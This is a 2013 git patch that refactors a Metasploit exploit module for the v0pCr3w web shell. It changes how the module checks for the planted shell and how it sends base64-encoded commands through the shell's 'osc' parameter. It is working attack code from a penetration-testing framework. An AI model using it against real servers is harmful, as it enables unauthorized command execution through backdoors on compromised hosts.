From a5346240de7712bcb2b135702bd46dba62db2495 Mon Sep 17 00:00:00 2001
From: bwall <nightstrike9809@gmail.com>
Date: Tue, 26 Mar 2013 01:33:30 -0400
Subject: [PATCH] Updated v0pCr3w_exec to use send_request_cgi

---
 modules/exploits/multi/misc/v0pCr3w_exec.rb | 23 ++++++++++++++-------
 1 file changed, 15 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/multi/misc/v0pCr3w_exec.rb b/modules/exploits/multi/misc/v0pCr3w_exec.rb
index d0a37b2091..dee59de808 100644
--- a/modules/exploits/multi/misc/v0pCr3w_exec.rb
+++ b/modules/exploits/multi/misc/v0pCr3w_exec.rb
@@ -53,10 +53,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(datastore['URI'])
-		uri += "?lol=1"
-
-		shell = send_request_raw({'uri' => uri}, 25)
+		shell = send_request_cgi({
+		    'method'   => 'GET',
+		    'uri'      => normalize_uri(datastore['URI']),
+		    'vars_get' => {
+			'lol' => '1'
+		    }
+		})
 		if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/)
 			return Exploit::CheckCode::Vulnerable
 		end
@@ -64,10 +67,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def http_send_command(cmd, opts = {})
-		p = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd))
-		uri = normalize_uri(datastore['URI'])
-		uri += '?osc=' + p
-		res = send_request_raw({'uri' => uri}, 25)
+		p = Rex::Text.encode_base64(cmd)
+		res = send_request_cgi({
+		    'method'   => 'GET',
+		    'uri'      => normalize_uri(datastore['URI']),
+		    'vars_get' => {
+			'osc' => p
+		    }
+		})
 		if not (res and res.code == 200)
 			fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
 		end